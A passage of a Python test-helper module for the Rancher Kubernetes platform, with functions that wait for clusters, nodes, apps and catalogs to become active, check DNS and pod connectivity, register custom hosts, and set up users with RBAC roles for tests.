validate_service_discovery(workload, scale, p_client, ns, pods)
host = "test" + str(random_int(10000, 99999)) + ".com"
path = "/name.html"
rule = {"host": host,
"paths":
[{"workloadIds": [workload.id], "targetPort": "80"}]}
ingress = p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
wait_for_ingress_to_active(p_client, ingress)
validate_ingress(p_client, cluster, [workload], host, path)
return cluster
def check_cluster_version(cluster, version):
cluster_k8s_version = \
cluster.appliedSpec["rancherKubernetesEngineConfig"][
"kubernetesVersion"]
assert cluster_k8s_version == version, \
"cluster_k8s_version: " + cluster_k8s_version + \
" Expected: " + version
expected_k8s_version = version[:version.find("-")]
k8s_version = execute_kubectl_cmd("version")
kubectl_k8s_version = k8s_version["serverVersion"]["gitVersion"]
assert kubectl_k8s_version == expected_k8s_version, \
"kubectl version: " + kubectl_k8s_version + \
" Expected: " + expected_k8s_version
def check_cluster_state(etcd_count):
css_resp = execute_kubectl_cmd("get cs")
css = css_resp["items"]
components = ["scheduler", "controller-manager"]
for i in range(0, etcd_count):
components.append("etcd-" + str(i))
print("components to check - " + str(components))
for cs in css:
component_name = cs["metadata"]["name"]
assert component_name in components
components.remove(component_name)
assert cs["conditions"][0]["status"] == "True"
assert cs["conditions"][0]["type"] == "Healthy"
assert len(components) == 0
def validate_dns_record(pod, record, expected):
# requires pod with `dig` available - TEST_IMAGE
host = '{0}.{1}.svc.cluster.local'.format(
record["name"], record["namespaceId"])
validate_dns_entry(pod, host, expected)
def validate_dns_entry(pod, host, expected):
if is_windows():
validate_dns_entry_windows(pod, host, expected)
return
# requires pod with `dig` available - TEST_IMAGE
cmd = 'ping -c 1 -W 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
assert ping_validation_pass is True
assert " 0% packet loss" in str(ping_output)
dig_cmd = 'dig {0} +short'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
for expected_value in expected:
assert expected_value in str(dig_output)
def validate_dns_entry_windows(pod, host, expected):
def ping_check():
ping_cmd = 'ping -w 1 -n 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, ping_cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
return ping_validation_pass and (" (0% loss)" in str(ping_output))
wait_for(callback=ping_check,
timeout_message="Failed to ping {0}".format(host))
def dig_check():
dig_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Resolve-DnsName {0}).IPAddress }}"'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
dig_validation_pass = True
for expected_value in expected:
if expected_value not in str(dig_output):
dig_validation_pass = False
break
return dig_validation_pass
wait_for(callback=dig_check,
timeout_message="Failed to resolve {0}".format(host))
def validate_dns_record_deleted(client, dns_record, timeout=DEFAULT_TIMEOUT):
"""
Checks whether dns_record got deleted successfully.
Validates if dns_record is null in for current object client.
@param client: Object client use to create dns_record
@param dns_record: record object subjected to be deleted
@param timeout: Max time to keep checking whether record is deleted or not
"""
time.sleep(2)
start = time.time()
records = client.list_dns_record(name=dns_record.name, ).data
while len(records) != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for record {} to be deleted"
"".format(dns_record.name))
time.sleep(.5)
records = client.list_dns_record(name=dns_record.name, ).data
def wait_for_nodes_to_become_active(client, cluster, exception_list=[],
retry_count=0):
nodes = client.list_node(clusterId=cluster.id).data
node_auto_deleted = False
for node in nodes:
if node.requestedHostname not in exception_list:
node = wait_for_node_status(client, node, "active")
if node is None:
print("Need to re-evalauate new node list")
node_auto_deleted = True
retry_count += 1
print("Retry Count:" + str(retry_count))
if node_auto_deleted and retry_count < 5:
wait_for_nodes_to_become_active(client, cluster, exception_list,
retry_count)
def wait_for_node_status(client, node, state):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
# Handle the case of nodes getting auto deleted when they are part of
# nodepools
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
while node_status != state:
if time.time() - start > MACHINE_TIMEOUT:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
return node
def wait_for_node_to_be_deleted(client, node, timeout=300):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
while node_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
def wait_for_cluster_node_count(client, cluster, expected_node_count,
timeout=300):
start = time.time()
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
while node_count != expected_node_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
def get_custom_host_registration_cmd(client, cluster, roles, node):
allowed_roles = ["etcd", "worker", "controlplane"]
cluster_tokens = client.list_cluster_registration_token(
clusterId=cluster.id).data
if len(cluster_tokens) > 0:
cluster_token = cluster_tokens[0]
else:
cluster_token = create_custom_host_registration_token(client, cluster)
additional_options = " --address " + node.public_ip_address + \
" --internal-address " + node.private_ip_address
if 'Administrator' == node.ssh_user:
cmd = cluster_token.windowsNodeCommand
cmd = cmd.replace('| iex', '--worker' + additional_options + ' | iex ')
else:
cmd = cluster_token.nodeCommand
for role in roles:
assert role in allowed_roles
cmd += " --" + role
cmd += additional_options
return cmd
def create_custom_host_registration_token(client, cluster):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster_token = client.create_cluster_registration_token(
clusterId=cluster.id)
cluster_token = client.wait_success(cluster_token)
assert cluster_token.state == 'active'
return cluster_token
def get_cluster_by_name(client, name):
clusters = client.list_cluster(name=name).data
assert len(clusters) == 1, "Cluster " + name + " does not exist"
return clusters[0]
def get_cluster_type(client, cluster):
cluster_configs = [
"amazonElasticContainerServiceConfig",
"azureKubernetesServiceConfig",
"googleKubernetesEngineConfig",
"rancherKubernetesEngineConfig"
]
if "rancherKubernetesEngineConfig" in cluster:
nodes = client.list_node(clusterId=cluster.id).data
if len(nodes) > 0:
if nodes[0].nodeTemplateId is None:
return "Custom"
for cluster_config in cluster_configs:
if cluster_config in cluster:
return cluster_config
return "Imported"
def delete_cluster(client, cluster):
nodes = client.list_node(clusterId=cluster.id).data
# Delete nodes(in cluster) from AWS for Imported and Custom Cluster
if len(nodes) > 0:
cluster_type = get_cluster_type(client, cluster)
print(cluster_type)
if get_cluster_type(client, cluster) in ["Imported", "Custom"]:
filters = [
{'Name': 'tag:Name',
'Values': ['testcustom*', 'teststress*', 'testsa*']}]
ip_filter = {}
ip_list = []
ip_filter['Name'] = \
'network-interface.addresses.association.public-ip'
ip_filter['Values'] = ip_list
filters.append(ip_filter)
for node in nodes:
host_ip = resolve_node_ip(node)
ip_list.append(host_ip)
assert len(ip_filter) > 0
print(ip_filter)
aws_nodes = AmazonWebServices().get_nodes(filters)
if aws_nodes is None:
# search instances by IPs in case names do not follow patterns
aws_nodes = AmazonWebServices().get_nodes(filters=[ip_filter])
if aws_nodes is None:
print("no instance is found in AWS")
else:
for node in aws_nodes:
print(node.public_ip_address)
AmazonWebServices().delete_nodes(aws_nodes)
# Delete Cluster
client.delete(cluster)
def check_connectivity_between_workloads(p_client1, workload1, p_client2,
workload2, allow_connectivity=True):
wl1_pods = p_client1.list_pod(workloadId=workload1.id).data
wl2_pods = p_client2.list_pod(workloadId=workload2.id).data
for pod in wl1_pods:
for o_pod in wl2_pods:
check_connectivity_between_pods(pod, o_pod, allow_connectivity)
def check_connectivity_between_workload_pods(p_client, workload):
pods = p_client.list_pod(workloadId=workload.id).data
for pod in pods:
for o_pod in pods:
check_connectivity_between_pods(pod, o_pod)
def check_connectivity_between_pods(pod1, pod2, allow_connectivity=True):
pod_ip = pod2.status.podIp
cmd = "ping -c 1 -W 1 " + pod_ip
if is_windows():
cmd = 'ping -w 1 -n 1 {0}'.format(pod_ip)
response = kubectl_pod_exec(pod1, cmd)
assert pod_ip in str(response)
if allow_connectivity:
if is_windows():
assert " (0% loss)" in str(response)
else:
assert " 0% packet loss" in str(response)
else:
if is_windows():
assert " (100% loss)" in str(response)
else:
assert " 100% packet loss" in str(response)
def kubectl_pod_exec(pod, cmd):
command = "exec " + pod.name + " -n " + pod.namespaceId + " -- " + cmd
return execute_kubectl_cmd(command, json_out=False, stderr=True)
def exec_shell_command(ip, port, cmd, password, user="root", sshKey=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if sshKey:
ssh.connect(ip, username=user, key_filename=sshKey, port=port)
else:
ssh.connect(ip, username=user, password=password, port=port)
stdin, stdout, stderr = ssh.exec_command(cmd)
response = stdout.readlines()
return response
def wait_for_ns_to_become_active(client, ns, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
while ns.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
return ns
def wait_for_pod_images(p_client, workload, ns_name, expectedimage, numofpods,
timeout=DEFAULT_TIMEOUT):
start = time.time()
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for x in range(0, numofpods - 1):
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
while podimage != expectedimage:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for correct pod images")
time.sleep(.5)
pods = execute_kubectl_cmd(get_pods)
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
def wait_for_pods_in_workload(p_client, workload, pod_count,
timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = p_client.list_pod(workloadId=workload.id).data
while len(pods) != pod_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for pods in workload {}. Expected {}. "
"Got {}".format(workload.name, pod_count, len(pods)))
time.sleep(.5)
pods = p_client.list_pod(workloadId=workload.id).data
return pods
def get_user_client_and_cluster(client=None):
if not client:
client = get_user_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def get_global_admin_client_and_cluster():
client = get_admin_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def validate_cluster_state(client, cluster,
check_intermediate_state=True,
intermediate_state="provisioning",
nodes_not_in_active_state=[]):
if check_intermediate_state:
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == intermediate_state,
lambda x: 'State is: ' + x.state,
timeout=MACHINE_TIMEOUT)
assert cluster.state == intermediate_state
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == "active",
lambda x: 'State is: ' + x.state,
timeout=MACHINE_TIMEOUT)
assert cluster.state == "active"
wait_for_nodes_to_become_active(client, cluster,
exception_list=nodes_not_in_active_state)
timeout = 60
start = time.time()
while "version" not in cluster.keys():
time.sleep(1)
cluster = client.reload(cluster)
delta = time.time() - start
if delta > timeout:
msg = "Timeout waiting for K8s version to be synced"
raise Exception(msg)
return cluster
def wait_until_available(client, obj, timeout=DEFAULT_TIMEOUT):
start = time.time()
sleep = 0.01
while True:
time.sleep(sleep)
sleep *= 2
if sleep > 2:
sleep = 2
try:
obj = client.reload(obj)
except ApiError as e:
if e.error.status != 403:
raise e
else:
return obj
delta = time.time() - start
if delta > timeout:
msg = 'Timeout waiting for [{}:{}] for condition after {}' \
' seconds'.format(obj.type, obj.id, delta)
raise Exception(msg)
def delete_node(aws_nodes):
for node in aws_nodes:
AmazonWebServices().delete_node(node)
def cluster_cleanup(client, cluster, aws_nodes=None):
if RANCHER_CLEANUP_CLUSTER:
client.delete(cluster)
if aws_nodes is not None:
delete_node(aws_nodes)
else:
env_details = "env.CATTLE_TEST_URL='" + CATTLE_TEST_URL + "'\n"
env_details += "env.ADMIN_TOKEN='" + ADMIN_TOKEN + "'\n"
env_details += "env.USER_TOKEN='" + USER_TOKEN + "'\n"
env_details += "env.CLUSTER_NAME='" + cluster.name + "'\n"
create_config_file(env_details)
def create_config_file(env_details):
file = open(env_file, "w")
file.write(env_details)
file.close()
def validate_hostPort(p_client, workload, source_port, cluster):
get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
pods = p_client.list_pod(workloadId=workload.id).data
nodes = get_schedulable_nodes(cluster)
for node in nodes:
target_name_list = []
for pod in pods:
print(pod.nodeId + " check " + node.id)
if pod.nodeId == node.id:
target_name_list.append(pod.name)
break
if len(target_name_list) > 0:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_lb(p_client, workload, source_port):
url = get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
target_name_list = get_target_names(p_client, [workload])
wait_until_lb_is_active(url)
validate_http_response(url + "/name.html", target_name_list)
def validate_nodePort(p_client, workload, cluster, source_port):
get_endpoint_url_for_workload(p_client, workload, 600)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
nodes = get_schedulable_nodes(cluster)
pods = p_client.list_pod(workloadId=wl.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
for node in nodes:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port_wk) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_clusterIp(p_client, workload, cluster_ip, test_pods, source_port):
pods = p_client.list_pod(workloadId=workload.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod["name"])
curl_cmd = "http://" + cluster_ip + ":" + \
str(source_port) + "/name.html"
for pod in test_pods:
validate_http_response(curl_cmd, target_name_list, pod)
def wait_for_pv_to_be_available(c_client, pv_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
while pv.state != "available":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to available")
time.sleep(.5)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
return pv
def wait_for_pvc_to_be_bound(p_client, pvc_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
while pvc.state != "bound":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to bound")
time.sleep(.5)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
return pvc
def create_wl_with_nfs(p_client, ns_id, pvc_name, wl_name,
mount_path, sub_path, is_daemonSet=False):
volumes = [{"type": "volume",
"name": "vol1",
"persistentVolumeClaim": {
"readOnly": "false",
"type": "persistentVolumeClaimVolumeSource",
"persistentVolumeClaimId": pvc_name
}}]
volumeMounts = [{"readOnly": "False",
"type": "volumeMount",
"mountPath": mount_path,
"subPath": sub_path,
"name": "vol1"
}]
con = [{"name": "test1",
"image": TEST_IMAGE,
"volumeMounts": volumeMounts
}]
if is_daemonSet:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes,
daemonSetConfig={})
else:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes)
return workload
def write_content_to_file(pod, content, filename):
cmd_write = "/bin/bash -c 'echo {1} > {0}'".format(filename, content)
if is_windows():
cmd_write = \
'powershell -NoLogo -NonInteractive -Command ' \
'"& { echo {1} > {0} }"'.format(filename, content)
output = kubectl_pod_exec(pod, cmd_write)
assert output.strip().decode('utf-8') == ""
def validate_file_content(pod, content, filename):
cmd_get_content = "/bin/bash -c 'cat {0}' ".format(filename)
if is_windows():
cmd_get_content = 'powershell -NoLogo -NonInteractive -Command ' \
'"& { cat {0} }"'.format(filename)
output = kubectl_pod_exec(pod, cmd_get_content)
assert output.strip().decode('utf-8') == content
def wait_for_mcapp_to_active(client, multiClusterApp,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
time.sleep(5)
# When the app is deployed it goes into Active state for a short
# period of time and then into installing/deploying.
mcapps = client.list_multiClusterApp(uuid=multiClusterApp.uuid,
name=multiClusterApp.name).data
start = time.time()
assert len(mcapps) == 1, "Cannot find multi cluster app"
mapp = mcapps[0]
while mapp.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
multiclusterapps = client.list_multiClusterApp(
uuid=multiClusterApp.uuid, name=multiClusterApp.name).data
assert len(multiclusterapps) == 1
mapp = multiclusterapps[0]
return mapp
def wait_for_app_to_active(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
"""
First wait for app to come in deployment state, then wait for it get
in active state. This is to avoid wrongly conclude that app is active
as app goes to state installing > active > deploying > active
@param client: Project client
@param app_id: App id of deployed app.
@param timeout: Max time allowed to wait for app to become active.
@return: app object
"""
start = time.time()
app_data = client.list_app(id=app_id).data
while len(app_data) == 0:
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for listing the app from API")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "deploying":
if time.time() - start > timeout / 3:
break
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
app = client.list_app(id=app_id).data
assert len(app) >= 1
application = app[0]
return application
def validate_response_app_endpoint(p_client, appId,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
ingress_list = p_client.list_ingress(namespaceId=appId).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
print(url)
start = time.time()
try:
while True:
r = requests.head(url)
print(r.status_code)
if r.status_code == 200:
return
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting response to be 200.")
time.sleep(.5)
except requests.ConnectionError:
print("failed to connect")
assert False, "failed to connect to the app"
def resolve_node_ip(node):
if hasattr(node, 'externalIpAddress'):
node_ip = node.externalIpAddress
else:
node_ip = node.ipAddress
return node_ip
def provision_nfs_server():
node = AmazonWebServices().create_node(random_test_name("nfs-server"))
node.wait_for_ssh_ready()
c_path = os.getcwd()
cmd_path = c_path + "/tests/v3_api/scripts/nfs-setup.sh"
command = open(cmd_path, 'r').read()
node.execute_command(command)
return node
def get_defaut_question_answers(client, externalId):
def get_answer(quest):
if "default" in quest.keys():
answer = quest["default"]
else:
answer = ""
# If required and no default value is available, set fake value
# only for type string . For other types error out
if "required" in quest.keys():
if quest["required"]:
if quest["type"] == "enum" and "options" in quest.keys():
answer = quest["options"][0]
elif quest["type"] == "password":
answer = "R@ncher135"
elif quest["type"] == "string":
answer = "fake"
else:
assert False, \
"Cannot set default for types {}" \
"".format(quest["type"])
return answer
def check_if_question_needed(questions_and_answers, ques):
add_question = False
match_string = ques["showIf"]
match_q_as = match_string.split("&&")
for q_a in match_q_as:
items = q_a.split("=")
if len(items) == 1:
items.append("")
if items[0] in questions_and_answers.keys():
if questions_and_answers[items[0]] == items[1]:
add_question = True
else:
add_question = False
break
return add_question
questions_and_answers = {}
print("external id = {}".format(externalId))
template_revs = client.list_template_version(externalId=externalId).data
assert len(template_revs) == 1
template_rev = template_revs[0]
questions = template_rev.questions
for ques in questions:
add_question = True
if "showIf" in ques.keys():
add_question = \
check_if_question_needed(questions_and_answers, ques)
if add_question:
question = ques["variable"]
answer = get_answer(ques)
questions_and_answers[question] = get_answer(ques)
if "showSubquestionIf" in ques.keys():
if ques["showSubquestionIf"] == answer:
sub_questions = ques["subquestions"]
for sub_question in sub_questions:
question = sub_question["variable"]
questions_and_answers[question] = \
get_answer(sub_question)
print("questions_and_answers = {}".format(questions_and_answers))
return questions_and_answers
def validate_app_deletion(client, app_id,
timeout=DEFAULT_APP_DELETION_TIMEOUT):
app_data = client.list_app(id=app_id).data
start = time.time()
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for app to delete")
time.sleep(.5)
app = client.list_app(id=app_id).data
if len(app) == 0:
break
def validate_catalog_app(proj_client, app, external_id, answer=None):
"""
This method validates all the workloads deployed are in active state,
have correct version and validates the answers.
@param proj_client: Project client object of a existing project.
@param app: Deployed app object.
@param external_id: URl of app API.
@param answer: answer, app seek while deploying, body of the post call.
@return: Deployed app object.
"""
if answer is None:
answers = get_defaut_question_answers(get_user_client(), external_id)
else:
answers = answer
# validate app is active
app = wait_for_app_to_active(proj_client, app.id)
assert app.externalId == external_id, \
"the version of the app is not correct"
# check if associated workloads are active
ns = app.targetNamespace
parameters = external_id.split('&')
assert len(parameters) > 1, \
"Incorrect list of parameters from catalog external ID"
chart_prefix = parameters[len(parameters) - 2].split("=")[1]
chart_suffix = parameters[len(parameters) - 1].split("=")[1]
chart = chart_prefix + "-" + chart_suffix
app_name = parameters[len(parameters) - 2].split("=")[1]
workloads = proj_client.list_workload(namespaceId=ns).data
for wl in workloads:
print("Workload {} , state - {}".format(wl.id, wl.state))
assert wl.state == "active"
chart_deployed = get_chart_info(wl.workloadLabels)
print("Chart detail of app - {}".format(chart_deployed))
# '-' check is to make sure chart has both app name and version.
if app_name in chart_deployed and '-' in chart_deployed:
assert chart_deployed == chart, "the chart version is wrong"
# Validate_app_answers
assert len(answers.items() - app["answers"].items()) == 0, \
"Answers are not same as the original catalog answers"
return app
def get_chart_info(workloadlabels):
"""
This method finds either 'chart' tag or
'helm.sh/chart' tag from workload API
@param workloadlabels: workloadslabel object
@return: chart value of workload e.g. 'app_name-version'
"""
if "chart" in workloadlabels.keys():
return workloadlabels.chart
elif "helm.sh/chart" in workloadlabels.keys():
return workloadlabels["helm.sh/chart"]
else:
return ''
def create_user(client, cattle_auth_url=CATTLE_AUTH_URL):
user_name = random_name()
user = client.create_user(username=user_name,
password=USER_PASSWORD)
client.create_global_role_binding(globalRoleId="user",
subjectKind="User",
userId=user.id)
user_token = get_user_token(user.username, USER_PASSWORD, cattle_auth_url)
return user, user_token
def get_user_token(username, password, cattle_auth_url=CATTLE_AUTH_URL):
r = requests.post(cattle_auth_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
print(r.json())
return r.json()["token"]
def rbac_get_user_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["user"]
return None
def rbac_get_user_token_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["token"]
return None
def rbac_get_kubeconfig_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["kubeconfig"]
return None
def rbac_get_project():
return rbac_data["project"]
def rbac_get_namespace():
return rbac_data["namespace"]
def rbac_get_workload():
return rbac_data["workload"]
def rbac_get_unshared_project():
return rbac_data["p_unshared"]
def rbac_get_unshared_ns():
return rbac_data["ns_unshared"]
def rbac_get_unshared_workload():
return rbac_data["wl_unshared"]
def rbac_prepare():
"""this function creates one project, one namespace,
and four users with different roles"""
admin_client, cluster = get_global_admin_client_and_cluster()
create_kubeconfig(cluster)
# create a new project in the cluster
project, ns = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-test-rbac"))
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
p_client = get_project_client_for_token(project, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, workload, "deployment", ns.name)
rbac_data["workload"] = workload
rbac_data["project"] = project
rbac_data["namespace"] = ns
# create new users
for key in rbac_data["users"]:
user1, token1 = create_user(admin_client)
rbac_data["users"][key]["user"] = user1
rbac_data["users"][key]["token"] = token1
# assign different role to each user
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_OWNER]["user"],
cluster,
CLUSTER_OWNER)
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_MEMBER]["user"],
cluster,
CLUSTER_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_MEMBER]["user"],
project,
PROJECT_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_OWNER]["user"],
project,
PROJECT_OWNER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_READ_ONLY]["user"],
project,
PROJECT_READ_ONLY)
# create kubeconfig files for each user
for key in rbac_data["users"]:
user_client = get_client_for_token(rbac_data["users"][key]["token"])
_, user_cluster = get_user_client_and_cluster(user_client)
rbac_data["users"][key]["kubeconfig"] = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
key + "_kubeconfig")
create_kubeconfig(user_cluster, rbac_data["users"][key]["kubeconfig"])
# create another project that none of the above users are assigned to
p2, ns2 = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-unshared"))
name = random_test_name("default")
p_client = get_project_client_for_token(p2, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns2.id)
validate_workload(p_client, workload, "deployment", ns2.name)
rbac_data["p_unshared"] = p2
rbac_data["ns_unshared"] = ns2
rbac_data["wl_unshared"] = workload
def rbac_cleanup():
""" remove the project, namespace and users created for the RBAC tests"""
try:
client = get_admin_client()
except Exception:
print("Not able to get admin client. Not performing RBAC cleanup")
return
for _, value in rbac_data["users"].items():
try:
client.delete(value["user"])
except Exception:
pass
client.delete(rbac_data["project"])
client.delete(rbac_data["wl_unshared"])
client.delete(rbac_data["p_unshared"])
def check_condition(condition_type, status):
def _find_condition(resource):
if not hasattr(resource, "conditions"):
return False
if resource.conditions is None:
return False
for condition in resource.conditions:
if condition.type == condition_type and condition.status == status:
return True
return False
return _find_condition
def create_catalog_external_id(catalog_name, template, version,
project_cluster_id=None, catalog_type=None):
if catalog_type is None:
return "catalog://?catalog=" + catalog_name + \
"&template=" + template + "&version=" + version
elif catalog_type == "project" or catalog_type == "cluster":
return "catalog://?catalog=" + project_cluster_id + "/" \
+ catalog_name + "&type=" + catalog_type \
+ "Catalog&template=" + template + "&version=" + version
def wait_for_catalog_active(client, catalog, timeout=DEFAULT_CATALOG_TIMEOUT):
time.sleep(2)
catalog_data = client.list_catalog(name=catalog.name)
print(catalog_data)
start = time.time()
assert len(catalog_data["data"]) >= 1, "Cannot find catalog"
catalog = catalog_data["data"][0]
while catalog.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
catalog_data = client.list_catalog(name=catalog.name)
assert len(catalog_data["data"]) >= 1
catalog = catalog_data["data"][0]
return catalog
def readDataFile(data_dir, name):
fname = os.path.join(data_dir, name)
print("File: " + fname)
is_file = os.path.isfile(fname)
assert is_file
with open(fname) as f:
return f.read()
def set_url_password_token(RANCHER_SERVER_URL):
"""Returns a ManagementContext for the default global admin user."""
CATTLE_AUTH_URL = \
RANCHER_SERVER_URL + "/v3-public/localproviders/local?action=login"
r = requests.post(CATTLE_AUTH_URL, json={
'username': 'admin',
'password': 'admin',
'responseType': 'json',
}, verify=False)
print(r.json())
token = r.json()['token']
print(token)
# Change admin password
client = rancher.Client(url=RANCHER_SERVER_URL + "/v3",
token=token, verify=False)
admin_user = client.list_user(username="admin").data
admin_user[0].setpassword(newPassword=ADMIN_PASSWORD)
# Set server-url settings
serverurl = client.list_setting(name="server-url").data
client.update(serverurl[0], value=RANCHER_SERVER_URL)
return token
def validate_create_catalog(token, catalog_name, branch, url, permission=True):
"""
This function validates if the user has the permission to create a
global catalog.
:param token: user's token
:param catalog_name: the name of the catalog
:param branch: the branch of the git repo
:param url: the url of the git repo
:param permission: boolean value, True if the user can create catalog
:return: the catalog object or None
"""
client = get_client_for_token(token)
if not permission:
with pytest.raises(ApiError) as e:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
error_msg = "user with no permission should receive 403: Forbidden"
error_code = e.value.error.code
error_status = e.value.error.status
assert error_status == 403 and error_code == 'Forbidden', error_msg
return None
else:
try:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
except ApiError as e:
assert False, "user with permission should receive no exception:" \
+ str(e.error.status) + " " + e.error.code
catalog_list = client.list_catalog(name=catalog_name).data
assert len(catalog_list) == 1
return catalog_list[0]
def generate_template_global_role(name, new_user_default=False, template=None):
""" generate a template that is used for creating a global role"""
if template is None:
template = TEMPLATE_MANAGE_CATALOG
template = deepcopy(template)
if new_user_default:
template["newUserDefault"] = "true"
else:
template["newUserDefault"] = "false"
if name is None:
name = random_name()
template["name"] = name
return template
def wait_for_backup_to_active(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
